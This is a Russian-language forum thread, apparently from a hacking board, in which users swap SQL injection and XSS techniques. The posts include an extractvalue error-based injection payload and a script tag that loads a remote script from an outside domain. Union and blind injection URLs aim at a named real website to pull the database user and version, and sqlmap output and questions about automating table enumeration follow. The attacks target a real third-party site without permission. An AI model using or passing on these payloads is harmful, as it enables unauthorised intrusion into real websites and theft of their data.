У меня в браезере что с вашей сессией, что без - кидает на второй скрин, ничего не меняется. Попробуйте выполнить <request action="save"><param name="CH_FLAGS">777") and extractvalue(1,concat(1,user()))=("1</param></request> Там вероятно update используется, хотя возможно и простая выборка.
sqlmap вывел таблици только вот кодировка непонятная не могу в нормальный вид вывести помогите пожалуйста.... back-end DBMS: Microsoft Access Database: [2 tables] +--------------------------------------------------------------+ | {AIP|h3I$0?QE?2§4%H87HFE\n>p | | {AIP|\x154%\x12\x11H87H\x1fFE\\n>p | +--------------------------------------------------------------+
Вставка в параметр или в тело? PHP: <script/src=//asd.ru></script> 30 Символов. Если найти 5-буквенный домен, это 29. Может быть как-то еще закрывающий тег можно опустить. P.S. Два слэша означают использование протокола сайта(HTTPS при HTTPS и HTTP при HTTP).
http://www.btlt.ru/comp/index.php?a=p&cat=8 and substring(@@version,1,1)=5 а дальше никак...! окажите помощь!
В пяти шагах отсюда и union есть: http://www.btlt.ru/comp/index.php?a=f&id=911 union select version(),user(),database()
такой вопросец, http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=ascii(substring(user(),1,1)) не дает вывода на страницу, почуму? ведь ascii(substring(user(),1,1)) ровняется 116 так нормальнро выводится http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=116 я как-то запрос не так составл?
Привет всем, есть инъекция вида Как можно автоматизировать подбор limit. И как можно узнать другие базы данных, не information_schema.
Спасибо большое. Скажите ищо пожалуйста где можно по подробнее прочитать про этот тип инъекций. Нужно автоматизировать замену и парсинг limit 1,1 ; limit 2,1 ; limit 3,1 для доставания таблиц и баз автоматически. Или можно что-то сделать с sqlmap?